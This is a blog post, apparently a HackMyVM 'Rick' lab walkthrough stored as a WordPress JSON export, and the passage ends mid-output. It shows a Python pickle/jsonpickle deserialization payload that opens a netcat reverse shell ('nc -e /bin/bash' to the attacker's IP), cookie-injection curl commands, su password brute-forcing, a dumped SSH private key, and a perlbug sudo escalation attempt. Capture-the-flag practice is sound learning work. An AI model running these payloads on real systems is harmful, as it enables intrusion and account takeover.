{"id":761,"date":"2024-07-16T17:23:04","date_gmt":"2024-07-16T09:23:04","guid":{"rendered":"http:\/\/162.14.82.114\/?p=761"},"modified":"2024-07-16T17:23:04","modified_gmt":"2024-07-16T09:23:04","slug":"hmv-_-rick","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/761\/07\/16\/2024\/","title":{"rendered":"hmv[-_-]Rick"},"content":{"rendered":"<h1>Rick<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722172.png\" alt=\"image-20240712183424922\" style=\"zoom: 50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722174.png\" alt=\"image-20240716145039964\" style=\"zoom:50%;\" 
\/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ rustscan -a $IP -- -A     \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 172.20.10.3:22\nOpen 172.20.10.3:80\nOpen 172.20.10.3:5000\n\nPORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 f9:c1:73:95:a4:17:df:f6:ed:5c:8e:8a:c8:05:f9:8f (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc6WD+nd5ZbnlOmJHKiExjfgbFX6q+QAKK3N+lsm6vntaQ3CRgdDBf37SsO5ptEHMUZrDPGBch03b0An18k6pHwSLfz5AuCTN3W0Rtqd2iFRqkhgoVatSEoESxCwULEpsRB738QhCeAfiTgHr\/s5WtdQAgEoSBS6e4k8KHRD1M+8FVHrolrvJA\/\/cQ7VzVvCDbQ\/eYWh3kUjRJj\/cFzY\/Jpgwu0QxNhzXmHwroAjtzd0D59f\/KIxG0ULyAr9aQoQVjy7fMN7wJyZZxhLLKSSMoT7G51khfn9Bwun9peI32IwZnVJ3L87fGgsSy\/KdOjJDRLsGCXJNtT+jUviHAaTWz\n|   256 be:c1:fd:f1:33:64:39:9a:68:35:64:f9:bd:27:ec:01 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIh5KJU7muB4UyLIXStFY9R+LekTaOgLGzYh\/sWHOO+aj7OOE8QDWgjPTSZt0uDG9+bmT3Uz8v3EY2b0QDP5X9I=\n|   256 66:f7:6a:e8:ed:d5:1d:2d:36:32:64:39:38:4f:9c:8a (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGBDJ\/OjwxXNZ01JjiQXyOVhcY3z9ADXsEWJEOUMdHpd\n80\/tcp   open  http    syn-ack Apache httpd 2.4.38 ((Debian))\n|_http-title: Apache2 Test Debian Default Page: It works\n|_http-server-header: Apache\/2.4.38 (Debian)\n| http-methods: \n|_  Supported Methods: HEAD GET POST OPTIONS\n5000\/tcp open  http    syn-ack Werkzeug httpd 0.15.5 (Python 2.7.16)\n| http-title: 500 Internal Server Error\n|_Requested resource was http:\/\/172.20.10.3:5000\/whoami\n| http-methods: \n|_  Supported Methods: HEAD OPTIONS GET\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<p>Just run a routine scan for now; it rarely turns up much anyway, and we can scan again later if needed.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x 
php,zip,bak,txt,html\n\/.php                 (Status: 403) [Size: 276]\n\/index.html           (Status: 200) [Size: 10706]\n\/.html                (Status: 403) [Size: 276]\n\/manual               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.3\/manual\/]\n\/javascript           (Status: 301) [Size: 315] [--&gt; http:\/\/172.20.10.3\/javascript\/]\n\/robots.txt           (Status: 403) [Size: 276]<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<p>Footprinting: the site serves nothing but the default Apache page.<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ whatweb http:\/\/$IP                                                                            \nhttp:\/\/172.20.10.3 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[172.20.10.3], Title[Apache2 Test Debian Default Page: It works]<\/code><\/pre>\n<h3>Sensitive Directories<\/h3>\n<p>Nothing useful turned up; essentially none of the directories are accessible.<\/p>\n<h3>Sensitive Ports<\/h3>\n<p>Take a look at port 5000, scanning it on one side while checking it by hand on the other:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722176.png\" alt=\"image-20240716145813718\" style=\"zoom:50%;\" \/><\/p>\n
<p>Clicking <code>Main page<\/code> goes back to:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722177.png\" alt=\"image-20240716145913892\" style=\"zoom:50%;\" \/><\/p>\n<p>Checking the page source revealed nothing odd and no hints, and an attempt to execute a command failed:<\/p>\n<pre><code class=\"language-bash\">http:\/\/172.20.10.3:5000\/id\n# Not Found\n# The requested URL was not found on the server. 
If you entered the URL manually please check your spelling and try again.<\/code><\/pre>\n<p>Try <code>F12<\/code> to inspect:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722178.png\" alt=\"image-20240716150219585\" style=\"zoom:50%;\" \/><\/p>\n<p>Found an unknown <code>base64<\/code>-encoded cookie:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ echo &#039;eyJweS9vYmplY3QiOiAiX19tYWluX18uVXNlciIsICJ1c2VybmFtZSI6ICJSaWNrIn0=&#039; | base64 -d | jq\n{\n  &quot;py\/object&quot;: &quot;__main__.User&quot;,\n  &quot;username&quot;: &quot;Rick&quot;\n}<\/code><\/pre>\n<p>It is clearly a serialized Python object, so search for deserialization vulnerabilities:<\/p>\n<p><a href=\"https:\/\/swisskyrepo.github.io\/PayloadsAllTheThings\/Insecure%20Deserialization\/Python\/#pickle\">https:\/\/swisskyrepo.github.io\/PayloadsAllTheThings\/Insecure%20Deserialization\/Python\/#pickle<\/a><\/p>\n<pre><code class=\"language-python\">import cPickle, os\nfrom base64 import b64encode, b64decode\n\nclass Evil(object):\n    def __reduce__(self):\n        return (os.system,(&quot;nc -e \/bin\/bash 172.20.10.8 1234&quot;,))\n\ne = Evil()\nevil_token = 
b64encode(cPickle.dumps(e))\nprint(&quot;Your Evil Token : {}&quot;).format(evil_token)<\/code><\/pre>\n<p>Try building a payload and see whether it executes:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ python2 exp.py\nYour Evil Token : Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ curl -b &quot;Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou&quot; http:\/\/$IP:5000\n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN&quot;&gt;\n&lt;title&gt;Redirecting...&lt;\/title&gt;\n&lt;h1&gt;Redirecting...&lt;\/h1&gt;\n&lt;p&gt;You should be redirected automatically to target URL: &lt;a href=&quot;\/whoami&quot;&gt;\/whoami&lt;\/a&gt;.  If not click the link.\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ echo &#039;Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou&#039; | base64 -d\ncposix\nsystem\np1\n(S&#039;nc -e \/bin\/bash 172.20.10.8 1234&#039;\np2\ntp3\nRp4\n.                    
<\/code><\/pre>\n<p>That did not quite work, so switch to another generator: <a href=\"https:\/\/github.com\/j0lt-github\/python-deserialization-attack-payload-generator\">https:\/\/github.com\/j0lt-github\/python-deserialization-attack-payload-generator<\/a><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722179.png\" alt=\"image-20240716153154864\" style=\"zoom: 33%;\" \/><\/p>\n<pre><code class=\"language-bash\"># git clone https:\/\/github.com\/j0lt-github\/python-deserialization-attack-payload-generator.git\n# cd python-deserialization-attack-payload-generator\n# ls -la\n# pip3 install -r requirements.txt\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ python3 peas.py                 \nEnter RCE command :nc -e \/bin\/bash 172.20.10.8 1234\nEnter operating system of target [linux\/windows] . Default is linux :\nWant to base64 encode payload ? 
[N\/y] :y\nEnter File location and name to save :.\/payload\nSelect Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :jsonpickle\nDone Saving file !!!!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ cat payload_jspick                                \neyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0= \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ echo &#039;eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0=&#039; | base64 -d \n{&quot;py\/reduce&quot;: [{&quot;py\/type&quot;: &quot;subprocess.Popen&quot;}, {&quot;py\/tuple&quot;: [{&quot;py\/tuple&quot;: [&quot;nc&quot;, &quot;-e&quot;, &quot;\/bin\/bash&quot;, &quot;172.20.10.8&quot;, &quot;1234&quot;]}]}]}<\/code><\/pre>\n<p>Looks perfect; give it a try:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ curl -b &quot;eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0=&quot; http:\/\/$IP:5000\n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN&quot;&gt;\n&lt;title&gt;Redirecting...&lt;\/title&gt;\n&lt;h1&gt;Redirecting...&lt;\/h1&gt;\n&lt;p&gt;You should be redirected automatically to target URL: &lt;a href=&quot;\/whoami&quot;&gt;\/whoami&lt;\/a&gt;.  
If not click the link.<\/code><\/pre>\n<p>Realized the cookie name had been left off; resend with the <code>username=<\/code> prefix:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ curl -b &quot;username=Y3Bvc2l4CnN5c3RlbQpwMQooUyduYyAtZSAvYmluL2Jhc2ggMTcyLjIwLjEwLjggMTIzNCcKcDIKdHAzClJwNAou&quot; http:\/\/$IP:5000\n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN&quot;&gt;\n&lt;title&gt;500 Internal Server Error&lt;\/title&gt;\n&lt;h1&gt;Internal Server Error&lt;\/h1&gt;\n&lt;p&gt;The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.&lt;\/p&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick\/python-deserialization-attack-payload-generator]\n\u2514\u2500$ curl -b &quot;username=eyJweS9yZWR1Y2UiOiBbeyJweS90eXBlIjogInN1YnByb2Nlc3MuUG9wZW4ifSwgeyJweS90dXBsZSI6IFt7InB5L3R1cGxlIjogWyJuYyIsICItZSIsICIvYmluL2Jhc2giLCAiMTcyLjIwLjEwLjgiLCAiMTIzNCJdfV19XX0=&quot; http:\/\/$IP:5000\n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/W3C\/\/DTD HTML 3.2 Final\/\/EN&quot;&gt;\n&lt;title&gt;500 Internal Server Error&lt;\/title&gt;\n&lt;h1&gt;Internal Server Error&lt;\/h1&gt;\n&lt;p&gt;The server encountered an internal error and was unable to complete your request. 
Either the server is overloaded or there is an error in the application.&lt;\/p&gt;<\/code><\/pre>\n<p>After running the second one, a shell came back:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407161722180.png\" alt=\"image-20240716154603168\" style=\"zoom:50%;\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@rick:\/var\/www\/html$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n(remote) www-data@rick:\/var\/www\/html$ cat \/etc\/passwd | grep &#039;sh&#039;\nroot:x:0:0:root:\/root:\/bin\/bash\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nrick:x:1000:1000:,,,:\/home\/rick:\/bin\/bash\nmorty:x:1001:1001:,,,:\/home\/morty:\/bin\/rbash\n(remote) www-data@rick:\/var\/www\/html$ cd \/home\/morty\/\n(remote) www-data@rick:\/home\/morty$ ls -la\ntotal 36\ndrwxr-xr-x 4 morty morty 4096 Nov 24  2021 .\ndrwxr-xr-x 4 root  root  4096 Nov 24  2021 ..\nlrwxrwxrwx 1 root  root     9 Nov 24  2021 .bash_history -&gt; 
\/dev\/null\n-rw-r--r-- 1 morty morty  220 Nov 24  2021 .bash_logout\n-rw-r--r-- 1 morty morty 3526 Nov 24  2021 .bashrc\ndrwx------ 3 morty morty 4096 Nov 24  2021 .gnupg\n-rw-r--r-- 1 rick  rick   107 Nov 24  2021 .important\n-rw-r--r-- 1 morty morty  807 Nov 24  2021 .profile\ndrwx------ 2 morty morty 4096 Nov 24  2021 .ssh\n-rw------- 1 morty morty  680 Nov 24  2021 .viminfo\n(remote) www-data@rick:\/home\/morty$ cat .important \n-***You are completely crazy Morty to keep a password that easy! Change it before you get hacked!***-\nRick<\/code><\/pre>\n<h3>Brute-forcing user morty with su<\/h3>\n<p>Upload a wordlist and the brute-force script: <a href=\"https:\/\/github.com\/carlospolop\/su-bruteforce\">https:\/\/github.com\/carlospolop\/su-bruteforce<\/a><\/p>\n<pre><code class=\"language-bash\">(remote) www-data@rick:\/tmp$ .\/suBF.sh -u morty\n  [+] Bruteforcing morty...\n^C\n(remote) www-data@rick:\/tmp$ .\/suBF.sh -u morty -w top12000.txt \n  [+] Bruteforcing morty...\n  You can login as morty using password: internet\n^C<\/code><\/pre>\n<p>We can now switch to that user:<\/p>\n<pre><code class=\"language-text\">morty\ninternet<\/code><\/pre>\n<h3>Privilege escalation via perlbug<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@rick:\/tmp$ su morty\nPassword: \nmorty@rick:\/tmp$ cd ~\nrbash: cd: restricted\nmorty@rick:\/tmp$ whoami\nmorty\nmorty@rick:\/tmp$ echo $SHELL\n\/bin\/rbash\nmorty@rick:\/tmp$ ls -la \/home\/morty\ntotal 36\ndrwxr-xr-x 4 morty morty 4096 Nov 24  2021 .\ndrwxr-xr-x 4 root  root  4096 Nov 24  2021 ..\nlrwxrwxrwx 1 root  root     9 Nov 24  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 morty morty  220 Nov 24  2021 .bash_logout\n-rw-r--r-- 1 morty morty 3526 Nov 24  2021 .bashrc\ndrwx------ 3 morty morty 4096 Nov 24  2021 .gnupg\n-rw-r--r-- 1 rick  rick   107 Nov 24  2021 .important\n-rw-r--r-- 1 morty morty  807 Nov 24  2021 .profile\ndrwx------ 2 morty morty 4096 Nov 24  2021 
.ssh\n-rw------- 1 morty morty  680 Nov 24  2021 .viminfo\nmorty@rick:\/tmp$ cat .ssh\/id_rsa\ncat: .ssh\/id_rsa: No such file or directory\nmorty@rick:\/tmp$ ls -la \/home\/morty\/.ssh\ntotal 16\ndrwx------ 2 morty morty 4096 Nov 24  2021 .\ndrwxr-xr-x 4 morty morty 4096 Nov 24  2021 ..\n-rw-r--r-- 1 morty morty  397 Nov 24  2021 authorized_keys\n-rw------- 1 morty morty 1823 Nov 24  2021 id_rsa\nmorty@rick:\/tmp$ cat \/home\/morty\/.ssh\/id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAy7by5MzwimmC6fONkUMVjQU31ABHe1YfN2OHOGL3JCOwYZt6ya3s\n+LAfEfcpE8y7Ksyi\/tzoEAUfT+bIp4DS5C9KaBgoks4GHl30IcXQr4BKELsCPm5liQS0i9\noCBW\/ECkKrsuwOxRqQk1QAgxJ0xh1A2LKgjGkIH0SW8fuem3oSmL3ki4tZ9wdHREx2d6BB\n6cfTmOjUNlDk9\/UeHvLicRPgIvAI0Y\/Aod1aP56qSK+9nujZlWhGkeenRC3Eme2FpcPW6M\nte0Zh32+CetgrTAZZtn\/FB+vohvjPyv8U77XjqK2d71aZypBYo4qVIZVjmwYii6iwYrRrL\nmfSA00mOtQAAA8hQRDPRUEQz0QAAAAdzc2gtcnNhAAABAQDLtvLkzPCKaYLp842RQxWNBT\nfUAEd7Vh83Y4c4YvckI7Bhm3rJrez4sB8R9ykTzLsqzKL+3OgQBR9P5singNLkL0poGCiS\nzgYeXfQhxdCvgEoQuwI+bmWJBLSL2gIFb8QKQquy7A7FGpCTVACDEnTGHUDYsqCMaQgfRJ\nbx+56behKYveSLi1n3B0dETHZ3oEHpx9OY6NQ2UOT39R4e8uJxE+Ai8AjRj8Ch3Vo\/nqpI\nr72e6NmVaEaR56dELcSZ7YWlw9boy17RmHfb4J62CtMBlm2f8UH6+iG+M\/K\/xTvteOorZ3\nvVpnKkFijipUhlWObBiKLqLBitGsuZ9IDTSY61AAAAAwEAAQAAAQBsyMyafAozj7aWIjZG\nDRHUFaZDcsa5STswQ9jwtoCNbvWAmhuO2W8DOmHNITRxW1HTwCWGfgb6jxGyhGZAdJ2pts\ntAHS6Ffrlru\/ZjlpQjNBnZJ1RCbIeSDM4xJIER0CZa6FFyIXadsNrloeUIGXH8XaDEV1c+\nw9PPhrwoipqfITOvI11+oWyaM5zFr\/ScTeP3UCAWnXAVpEaJMRPUyzN1HWcbqlPds6iVEm\nwy+nUxWDn2tkHYkXvsxg\/4iK54f5mdgvobkMJe6YXlmmDTwIqxM26NCn+YcnuBSNZTpgSv\nerAfSu86toGvwpVj3QN7Sd7xoPKExsKQz6nn6LCNGot9AAAAgQDNHON6hrdcZCrc7+2fhu\n4ZyDX2\/lzggW5eGN4Q2zX2WyVIfpYwxH9M+bMpDSVYaFcw4u38BDo6gGgptdzYvOukvkOJ\nPXuH40SVJMpJGzCRr9x+O4y3A61u7SfOH+e+Qa4Z32GRt5X3iTIYDGhoTEwdDAe9mbIF60\nKeXF\/cF6XO\/gAAAIEA8xCxeR\/rXL1Rennm\/jObw\/Nvtv9NuA4TlMVTk5qiAikyp7iEXWOo\n4Psfr9HKJ8j3xt0jaIVvMxExva+XfvfduQybBidLhf8p3Z03NwNIcK
NBydakMomjN1HKxY\nNV+DbeHL0X6+9Z8NuF4HVd0GjpOKe4EZ5VFLsyjs8JHoKOYLMAAACBANaOLZSvEa0DSR9b\n8XP97CGjp97fEl\/gyOjmha2sW4ZXdEj55j\/CyZ6FdT8BsF9ygTtBFBDI5\/pFkdKQNxj\/Aw\nTsGzDINUlZhk3iK4Mkk5\/DsUU1V4fW2vUiXAb\/WkLNd+frGHC\/ewUC0y077ClTnOCR8OX9\nhj+7nT1fqBN\/qbb3AAAAD21vcnR5QHN5bWZvbm9zNAECAw==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<p>Try logging in with the key and see whether we can escape to a proper shell!<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/rick]\n\u2514\u2500$ ssh morty@$IP -i morty -t bash                              \nThe authenticity of host &#039;172.20.10.3 (172.20.10.3)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:ntMXt1jIeiDKNEuRMRXU6uCVo\/fmwaEqmxDA5r4nwds.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;172.20.10.3&#039; (ED25519) to the list of known hosts.\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ sudo -l\nMatching Defaults entries for morty on rick:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser morty may run the following commands on rick:\n    (rick) NOPASSWD: \/usr\/bin\/perlbug<\/code><\/pre>\n<p>Found a privilege escalation route: <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/perlbug\/\">https:\/\/gtfobins.github.io\/gtfobins\/perlbug\/<\/a><\/p>\n<p>Try it:<\/p>\n<pre><code class=\"language-bash\">morty@rick:~$ sudo -u rick \/usr\/bin\/perlbug -s &#039;x x x&#039; -r x -c x -e &#039;exec \/bin\/bash;&#039;\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain perl at\nperlbug@perl.org.  
To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n&#039;perlthanks&#039;.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it&#039;s not, just hit Enter\nto skip this question.\n\nModule: whoami\nwhoami is not a &quot;core&quot; Perl module. Please check that you\nentered its name correctly. If it is correct, quit this program,\ntry searching for whoami on http:\/\/rt.cpan.org, and report your\nissue there.\n\nIf your bug is about a Perl module rather than a core language\nfeature, please enter its name here. If it&#039;s not, just hit Enter\nto skip this question.\n\nModule: ^C\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash\nmorty@rick:~$ whoami;id\nmorty\nuid=1001(morty) gid=1001(morty) groups=1001(morty)\nmorty@rick:~$ sudo -u rick \/usr\/bin\/perlbug -s &#039;whoami&#039; -r x -c x -e &#039;exec \/bin\/bash;&#039;\nThis program provides an easy way to create a message reporting\na bug in the core perl distribution (along with tests or\npatches) to the volunteers who maintain perl at\nperlbug@perl.org.  To send a thank-you note to perl-\nthanks@perl.org instead of a bug report, please run\n&#039;perlthanks&#039;.\n\nPlease do not use \/usr\/bin\/perlbug to send test messages, test\nwhether perl works, or to report bugs in perl modules from CPAN.\n\nSuggestions for how to find help using Perl can be found at\nhttp:\/\/perldoc.perl.org\/perlcommunity.html\n\nThe subject you entered wasn&#039;t very descriptive. 
Please try again.\n\nFirst of all, please provide a subject for the message.\nThis should be a concise description of your bug or problem\nwhich will help the volunteers working to improve perl to\ncategorize and resolve the issue.  Be as specific and\ndescriptive as you can. A subject like &quot;perl bug&quot; or &quot;perl\nproblem&quot; will make it much less likely that your issue gets the\nattention it deserves.\n\nSubject: whoami\n\nThe subject you entered wasn&#039;t very descriptive. Please try again.\n\nSubject: ^C\nmorty@rick:~$ whoami;id\nmorty\nuid=1001(morty) gid=1001(morty) groups=1001(morty)<\/code><\/pre>\n<p>Still no luck. Try another way to get a real <code>bash<\/code> first: the home directory shows traces of <code>vim<\/code> editing, so try to spawn a shell from <code>vim<\/code>!<\/p>\n<pre><code class=\"language-bash\">morty@rick:~$ vim -c &#039;:!\/bin\/bash&#039;\n\n\/bin\/rbash: \/bin\/bash: restricted: cannot specify `\/&#039; in command names\n\nshell returned 1\n\nPress ENTER or type command to continue\nmorty@rick:~$ echo $SHELL\n\/bin\/rbash<\/code><\/pre>\n<p>Keep looking for relevant information:<\/p>\n<pre><code class=\"language-bash\">morty@rick:~$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\nmorty@rick:~$ 
printenv\nSHELL=\/bin\/rbash\nPWD=\/home\/morty\nLOGNAME=morty\nXDG_SESSION_TYPE=tty\nHOME=\/home\/morty\nLANG=en_US.UTF-8\nLS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:\nVIMRUNTIME=\/usr\/share\/vim\/vim81\nSSH_CONNECTION=172.20.10.8 38636 172.20.10.3 